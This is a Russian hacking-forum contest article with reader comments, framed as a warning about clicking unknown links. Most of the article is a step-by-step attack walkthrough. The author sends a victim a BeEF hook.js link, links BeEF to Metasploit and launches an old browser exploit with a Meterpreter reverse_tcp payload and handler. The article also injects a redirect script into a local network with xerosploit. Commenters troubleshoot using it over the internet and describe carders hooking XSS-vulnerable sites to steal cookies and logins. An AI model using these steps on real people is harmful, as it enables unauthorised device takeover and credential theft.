Статья Опасность перехода по неизвестным URL. Взлом устройств.

Статья для участия в конкурсе на codeby.

Приветствую друзья! Сегодня мы поговорим о всей опасности перехода по URL от неизвестных лиц. Также будет много практики. Надеюсь вам будет интересно. Приступим!

Введение.

Каждый раз когда вы переходите по ссылке от неизвестного вам человека, задумывались ли вы о всей опасности того что вы сделали?
Переходя по ссылке вы можете не подозревать, но на вашем устройстве после перехода могут находится вредоносные программы а ваши персональные данные могут быть похищены. Сегодня мы на примерах убедимся во всей опасности...

  • Первое что может случится при переходе по ссылке это то, что злоумышленник получет доступ к вашим аккаунтам социальных сетей.
Данный метод мы затрагивать не будем. Он был описан мной в цикле статей - Получение доступа к аккаунтам социальных сетей.
  • Могут узнать ваш IP. И если вы думаете что это не страшно, то вы глубоко ошибаетесь.
  • Подгрузить малварь используя exploit pack.
На мой взгляд, это самое серьезное что может произойти. Ну что, меньше теории больше практики)

Подгружаем малварь.

Exploit pack - это своеобразная связка эксплойтов.

К прибольшому сожалению я не буду показывать в этой теме использование exploit pack'а. По той простой причине, что огонь это не игрушка. Но мы все равно завладеем всем устройством пользователя когда он перейдет по ссылке. А поможет нам сегодня beef в связке с metasploit. Этот способ я придумал совсем недавно.

Beef - это фреймворк для проведения XSS атак путем заражения и дальнейшего использования.
Metasploit - фреймворк для поиска и эксплоутации уязвимостей. То есть для проветения тестирования на проникновение.

Запуск beef.

В терминале пишем
Код:
beef-xss
Переходим по ссылке ниже
Теперь нужно авторизироватся. Логин и пароль по умолчанию beef:beef.
Нам нужно чтобы "жертва" выполнила у себя скрипт hook.js
Нужно подгрузить его ей.
http://<ваш ip>:3000/demos/basic.html
Далее сократите ссылку и скиньте пользователю. Как только он переходит по ссылке на панели управления beef в разделе Online browsers появится активный браузер. Это браузер нашего пользователя.
Половина дел сделано. Теперь подключим к нашей работе metasploit. Для этого:
  1. Открываем файл config.yaml у beef. Часто он находится в этой дериктории - /usr/share/beef-xss/
  2. Ищем там раздел extension. У metasploit меняем значение параметра на true
Screenshot_from_2017-35.png
  1. Теперь же открываем файл /usr/share/beef-xss/extensions/metasploit/config.yaml и изменяем значение параметров у callback_host и host.
  2. Запускаем metasploit и пишем следующее
Код:
msf> load msgrpc
Screenshot_from_2017-11-07_11-32-20.png

И снова открываем файл из пункта 3. В pass вписываем получившийся с генерированный пароль. Остается сохранить.
Переходим в /usr/share/beef-xss/ и пишем
Код:
./beef -x
После этого в beef загрузятся exploit'ы.
Теперь нам доступны exploit'ы которые мы тоже подгрузить пользователю и выполнить их. Для начала я хотел бы узнать какая ОС у моего пользователя.

Screenshot_from_2017-11-07_12-03-22.png
И как видно на скриншоте - это windows.
Теперь переходим во вкладку Commands и ищем - msf_ms05_054_onload

Screenshot_from_2017-11-07_11-49-29.png
Выберем payload. Так как у моей "жертвы" windows я выбрал - windows/meterpreter/reverse_tcp
Заполняем все поля.
Теперь открываем msf и пишем
Код:
1. use exploit/multi/handler
2. set payload windows/meterpreter/reverse_tcp
3. set LHOST <your_ip>
4. exploit

Во второй команде пишете название пайлоада который выбрали в beef. Вот и все)
А пользователь всего-то перешел по ссылке.

А что если пользователь придерживается правил "я по незнакомым ссылкам не хожу"? На этот случай у нас имеется еще один ответ. Создаем файл hack.js с таким содержимым:
HTML:
<script>
document.location.href="http://<your ip>:3000/demos/basic.html";
</script>

Запускаем xerosploit. И выбираем:
Код:
scan --> ip жертвы --> injectjs --> run --> путь до hack.js
Далее проделываем выше описанное.Вот так мы взломали не о чем не подозревающего пользователя. Будьте осторожны друзья)

Вывод

Не стоит переходить по ссылкам от незнакомцев, это может нанести критический вред вашему устройству. А представьте себе если залить hook.js на уязвимый к xss веб ресурс? Последствия просто ужасны. Надеюсь вам понравилась данная статья!
 
Последнее редактирование:

crestfo

Green Team
21.06.2017
15
2
BIT
0
Не получилось экспортировать эксплойты в beef.
Разобрался, пришлось почему-то удалить beef, потом сделать всё заново по мануалу и загрузились.
Но сработало почему-то только один раз, дальше тестирую - нифига.
 

gushmazuko

Green Team
24.03.2017
173
451
BIT
1
Эксплоит работает только с IE6 на Win XP. Есть ли рабочий эксплоит для Win 7+? Просто я не нашел.
А так статья интересная.
 

NSNL.dll

Green Team
03.02.2018
41
6
BIT
0
Попробуй пробросить порт для полезной нагрузки. Т.е порт должен слушаться за NATом. Если по каким то причинам вам этого не удается сделать, попробуйте использовать для тестирования бесплатный сервис VPN.
[doublepost=1510244720,1510244512][/doublepost]Интересная статья, но есть вопрос. Полезная нагрузка сохраняется пока пользователь находится на сайте?
Собственно захотел потестить с другом. (по его согласию). Скинул ему ссылку. В итоге у него просто бесконечная загрузка. При этом ставил биф и на публичный айпи и на айпи с бесплатного ВПН сервиса по протаколу опенвпн (впнбук.нет). Что я делаю не так? В локалке конечно всё работает. Что нужно сделать чтобы в глобальной сети работал сайт?
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
публичные эксплойты экспортируются...только они палятся.
Beef по моему мнению, лучше подходит для СИ, выбираешь так сказать ,какое окошечко что бы всплыло на тестируемой машине, ну а там следом можно полезную нагрузочку подгрузить..)
Но а в целом , мне кажется что инструмент пережил свое время.
 
  • Нравится
Реакции: Underwood
U

Underwood

публичные эксплойты экспортируются...только они палятся.
Beef по моему мнению, лучше подходит для СИ, выбираешь так сказать ,какое окошечко что бы всплыло на тестируемой машине, ну а там следом можно полезную нагрузочку подгрузить..)
Но а в целом , мне кажется что инструмент пережил свое время.
Поддерживаю, подходит только для тренировок в лабораторных условиях для понимания методологии вектора атак на браузеры
В "боевых условиях" реального тестирования, рекомендую рассмотреть - современный Javascript фреймворк использующий ReactJS, Redux, Typescript, Webpack.
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
спасибо огромное ..я как то наткнулся в нете на его..и не запомнил, потом долго искал, а тут вы с таким подарком..
 
  • Нравится
Реакции: Underwood

Сергей Попов

Кодебай
30.12.2015
4 718
6 707
BIT
366
В "боевых условиях" реального тестирования, рекомендую рассмотреть - современный Javascript фреймворк использующий ReactJS, Redux, Typescript, Webpack.
Отличная тема для обзора на кодебай, не находите ;)
 

Linker21

New member
18.03.2020
3
0
BIT
0
Здравствуйте , хотел спросить на счет Beef Framework , когда я открываю сайт со скриптом "hook.js" , я же и появляюсь в папке Online Browsers , но как только я закрываю страницу со скриптом , мой же лог пропадает из Online Browsers.
Хотел узнать,что необходимо чтобы сессия не терялась после закрытия страницы со скриптом , а так же была доступна после закрытия и открытия браузера?
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Добрый вечер, что бы сессия была доступна после закрытия браузера, нужно что бы человек загрузил полезную нагрузку.
 

kot-gor

Well-known member
07.09.2016
529
705
BIT
0
Добрый вечер. посмотрите как вариант
правда синтаксис будет немного другой, с учетом что версии продуктов изменились.
 
  • Нравится
Реакции: Linker21

Linker21

New member
18.03.2020
3
0
BIT
0
Добрый вечер. посмотрите как вариант
правда синтаксис будет немного другой, с учетом что версии продуктов изменились.
Но все же , если жертва закроет страницу со скриптом hook.js , уведомление о Flash Update пропадет? (Или все же останется после закрытия страницы?)
То есть это разовая возможность?
 

RavenHack

Member
28.03.2020
5
0
BIT
0
Статья аля как запугать мамку юзать инет

АХАХАХА
Ну точно ) Я думаю надо не статьи писать а готовые решения !)))) Это

И так начнем ! Если вы не web разраб то эта статья для вас как описал выше коллега шугануть глистов !)))) Используется сей замечательный фреймворк совершенно для других целей ! Создать атаку в локальной сети подменить трафик можно совершено другими решениями и уязвимостями ! Далее используя инджект hook.js он внедряется во все открытые страници агента ( браузера ) соответственно биф не отвалиться . Фрейм ворк создали еще при динозаврах ! Половина функционала не актуальна ! Обновление флеш плеера ( вы слышите себя ??????? ) это каменный век ! Фреймворк с открытым кодом ! Меняйте шаблоны на свои не тупите ! Прочитайте переведите статью автора ! Там на замену разработали уже нового поколения зверька ! Но beef не заменим в некоторых случаях ! Вы должны определиться кто вы ! Инфраструктурщик который на взломаном wifi (предприятия фирмы) пытаеться внедрить код (полезную нагрузку) всеми возможными способами ! Или кардер который массово взламывает xss уязвимости сайтов и внедряет в них код beef для сбора куки и пары логин-парол ! Чтоб потом прочекать их на валидность в али или еще где то ! Надо четко разделять понимание цели тогда вы будите учиться в два раза быстрей ! И кстати почему ни кто не говорит что beef имеет командную строку и автоматизацию атак без вашего участия ! Это жесть использовать простейшую форму этого фреймворка.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!